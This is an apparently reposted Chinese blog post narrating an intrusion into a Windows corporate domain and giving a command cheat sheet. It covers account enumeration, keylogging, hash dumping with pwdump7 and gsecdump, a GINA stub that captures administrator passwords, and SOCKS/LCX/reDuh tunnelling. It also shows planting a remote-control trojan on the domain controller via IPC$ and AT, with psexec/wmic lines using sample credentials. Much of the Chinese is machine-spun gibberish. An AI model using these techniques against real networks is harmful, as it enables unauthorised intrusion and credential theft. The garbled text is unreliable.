|
|
|
联系客服020-83701501

域内网渗透小结

联系在线客服,可以获得免费在线咨询服务。 QQ咨询 我要预约
域内网渗透小结

1.收集信息
1-1.非论甚么途径得到的内网板滞,确定他在内网后,咱们首先就要了解这台板滞的所属职员,假设咱们的目标是公司,那咱们就要了解这个人私家在公司里的职位,他是个甚么身份,有多大的权力,这都关连到他在内网里的权限。由于,作为至公司,一个高权限的人他在内网里所要用到的东西就多,那么相对他的板滞,虽然权限就会比一样平常泛泛员工的高良多,这在我的渗透进程中是常见的。
既然有了他的板滞,那么翻翻他的电脑这是需要的,假设你说要怎么样翻,你可能尝试熟悉他的电脑以致比他巨匠还熟,那你就算了解详细了。一台个人私家用的电脑,从上面翻出与他本人关系的一些信息,和大批公司信息应当是没有题方针,除非,这是台新电脑。
1-2.了解了一定的职员信息,期间你要记下你所把握到的账号,密码这些烦忙数据,当前有一定的用,所以,在你渗畴前,不妨建个记事本将烦忙信息生存起来,写个记事本不会浪掷你多少工夫光阴。接下来,咱们就应当对这个Internet终止一定的了解,他是一样平常的内网,还是域?一样平常至公司屯子用域的,咱们只必要查一下就晓得,要想对他终止渗透,你就必需了解他的Internet拓补,虽然,一些太详细的物理上咱们是无奈了解的,咱们只能了解咱们所能晓得的。非论他是INT,DMZ,LAN,咱们必需匮乏把握。在这,咱们就会用到一定的命令,信赖本人应当都很熟悉。
ipconfig /all 盘问一下本机的一些状况,IP段 网关 属于不属于域
net view 盘问一些存在分割的板滞,一样平常以板滞名泄漏表现,咱们必要对其PING出IP,一是轻易盘问哪些烦忙板滞的IP,二是轻易盘问存在几个段
net view /domain 盘问有几个域 由于大型Internet外貌一样平常不止一个域的
net group /domain 盘问域外貌的组
net user /domain 盘问域用户
net group “domain admins” /domain 盘问域解决用户组
这些但凡咱们必要了解的,虽然偶然候还会必要再盘问一些信息,NET命令下你们屯子找到,不必要我再重复,详细的状况详细分析题目。
2.信息归档
2-1。有了信息,咱们就要对信息终止一定的归档,将每个板滞名所对应的IP归档,轻易历时不会乱。
2-2。盘问出的用户,解决员,咱们也必需归档。
2-3。盘问信息时大约出现的有操作代价信息必需归档。
3.技术操作
3-1。非论是颠末键盘记载。也许HASH的抓取,咱们必要将账号,密码,邮箱,凡是涉及环节数据的部门生存,一方面是预备渗透的原料,二是防备当前操作板滞会掉。
3-1-1。操作远控的键盘记载终止抓取。
3-1-2。操作PWDUMP7也许GETHASHES终止抓取HASH,此后破解。GETHASHES V1.4后 可能抓取域的部门HASH。
3-1-3。用GINASTUB.DLL失掉解决员的账号和密码。由于域解决员有权限登陆任何一台板滞。种上这个只是轻易记载他所登陆的密码。INSTALL后,会在SYSYTEM32下生成一个 FAXMODE.INC 文件记载密码。
3-2。有了内网,良多东西咱们是没有需要间接在当前操作板滞上操作的,他人虽然是内网,但是不代表他没有灌注体系,所以,咱们创建SOCKS也许VPN是很有需要的,创建SOCKS信赖本人屯子了吧。
3-2-1。我在这举荐 VIDC 这个工具,很轻易,在CMD下间接操 VIDC.EXE -D -P PORT 就可能了。
3-2-2。在操作板滞上使用LCX,CMD下 LCX.EXE -SLAVE 效力器IP PORT 127.0.0.1 PORT,此后到效力器上 CMD下 LCX.EXE -LISTEN 效力器IP PORT 方便PORT。
3-2-3。创建SOCKS后在本地可能用SOCKSCAP来终止连接,失利连接后该操作甚么就看你们本人了。
底子上咱们就只能操作这么多了,反面已经没有甚么技术上的再使用或操作,但是这两真个教诲很多,所必要处理的细节也很多。
咱们在获得内网板滞后,假设他存在域,但是没有使用域账号怎么样办?那咱们只能盘问也许想尽一切才智得到他少用的账号密码,此后操作这个账号密码,再颠末SOCKS进入域。这其中就关连到各位偕行检查管教板滞的文件,还有记载密码,GINA,HASH破解,这些但凡必需的。
进入域后,咱们又该怎么样做,创建SOCKS后又该怎么样做。咱们可能扔S下来检查次要的端口,咱们可能对端口终止弱口令的尝试,咱们可能针对内网的WEB终止检测,门径良多,以致你可能用MS08-067对另一台板滞终止冲破,但是信赖我,能使用域的板滞,大全部但凡补钉打齐的。咱们能操作的很少,但是不克不及灰心,只要能在内网穿梭,咱们至少在灌注上会求助良多,咱们必要的只是火暴和工夫光阴。
一旦拥有密码,咱们就可能尝试IPC连接,间接拿下域,这就得看你们的权限有多大。
net use [url=file://ip/ipc$]IPipc$[/url] password /user:username@domain
举荐使用多么的门径输出账号和密码,为甚么?假设用户名存在空格,你多么输会平安些。甚么 域用户不克不及存在空格?
是的,过来我也认为不会,微软的讲师也说不会,不过,经过我的测试和教诲,那是假的,域 完全可能空格,除了 user name 多么的,还可能存在 user na me ,不信 你可能尝尝。
创建IPC后,你只是想COPY文件 也许 RAR文件 再也许种马 那就是你的自在了。
后话:近来由于在渗域,在渗透进程中,也确实出现一些题目,几次但凡不知如何终止,切实在技术上,并无甚么障碍。次假设在于对方有着比较强的主灌注,而我的远控最末尾连CMD都无奈实验,后经过几天的状况测试,冲破了CMD。有了CMD后,终止了盘问,得到了一些信息,就末尾了往下的渗透,被控板滞的密码我不是跑进去的,我是翻他的文件翻出他少用密码的。由于他没有使用域账号,但凡以体系账号登陆,所以无奈检查域。我只能用他的域账号创建IPC连接,查找到内网的一个WEB效力,将其渗透后才算拿下了一个固执的内网板滞。
拿下内网WEB效力器后,我就已经完全在域内,没有使用HASH INJECTION,我是先盘问了DOMAIN ADMINS,创造WEB效力器上的账号就属于这个组,PW后获患了HASH,破解掉我就连向了域控效力器的IPC$。
连接了IPC$,间接在其SYSYTEM32下扔了一个远控,此后用AT命令将其提议,这期间我尝试了5个SHIFT,但是SHIFT封闭后,我的远控也会掉,所以打扫了这种法子,还是用AT来ADD NEW JOB 比较轻易。
给域控效力器种了远控,操作CMD来GETHASHES了部门的HASHES终止破解,很幸福的查到了文件解决组的用户,这才有了我反面的目标告竣。
总的来说,我这次的渗透比较命运好,两端省事事不是太多,不过也花了半个月的工夫光阴,工夫光阴大全部花在测试灌注状况,软件免杀,木马免杀,查找原料这些上面。
开初,我失掉了他的Internet拓补图,创造我所呆的区域只是一个小小的域,还有好几个域我尚未涉及到,在域的反面是DMZ,而DMZ反面虽然是INT了。
已经很晚了,本来是在写一份详细的渗透进程,不过由于不停使命,良多细节没有体式花色当场记载,所以,暂时在BLOG上写一些能想到的,反面假设有工夫光阴有状况,会再补救更多的细节以及图片和在渗透时所遇到的省事,如何打点等写进去。
———————————————————————————————-
少用命令
net view
检查对立域/使命组的计算机列表
net view /domain
检查域/使命组列表
net view /domain:Secwing
检查Secwing域中 计算机列表
net group /domain
检查地点域的组
net user /domain
检查地点域用户
net user /domain zerosoul 12345678
修改域用户密码,必要域解决员权限,也许Ctrl+Alt+Del点击修改则不必要域解决员权限
net localgroup administrators SECWINGzerosoul /add
域Users组用户增加到本地Administrators组,必要本地解决员或域解决员在本机登陆域落伍行
下面的命令 只能用于 域管教器:
net group “Domain controllers”
检查域管教器(假设有多台)
net group
检查域的组
net group “domain admins”
检查域解决员
net group “domain users”
检查域解决员
PS:打开配置域管教器领导的命令
dcpromo
psexec /accepteula 绕过第一次验证窗口
mstsc/admin 打点hash无奈抓出题目
wmic /node:172.16.19.96 /user:ABIMAQAdministrator /password:k78m90 process call create c:kav2009.exe
psexec.exe -s -u administrator -p k78m90 [url=file://172.16.16.2/]172.16.16.2[/url] -c c:kav2009.exe 拷贝文件并且实验
psexec.exe -s -u administrator -p km3h7i [url=file://172.16.16.2/]172.16.16.2[/url] -c c:kavgsecdump.exe -u 抓取hash
net use [url=file://172.16.16.2/IPC$]172.16.16.2IPC$[/url] “k78m90″ /user:”admintitrator”
net use [url=file://172.16.16.2/IPC$]172.16.16.2IPC$[/url] “k78m90″ /user:”aABIMAQAdministrator”
net time [url=file://172.16.16.2/]172.16.16.2[/url]
at [url=file://172.16.16.2/]172.16.16.2[/url] 13:50 2009.exe
java reDuhClient fdc1.cnhan.com http 80 /admin/reduh.aspx reduh连接命令
[createTunnel]1234:127.0.0.1:3389 端口转向命令
iam-alt -h user-hash 多么hash就被注入了
whosthere-alt.exe 来检查能否被注入失利。

假设你而今正在渗透一个域也许是内网想进修更粗浅的渗透门径,可能参考《常例内网渗透思路总结》《域内特定目标渗透法子纲目》

本文使命编纂:Mr.Lonely

转自Internet由Internet平安攻防研究室(www.91ri.org)信息平安小组收集整理。

数安新闻+更多

证书相关+更多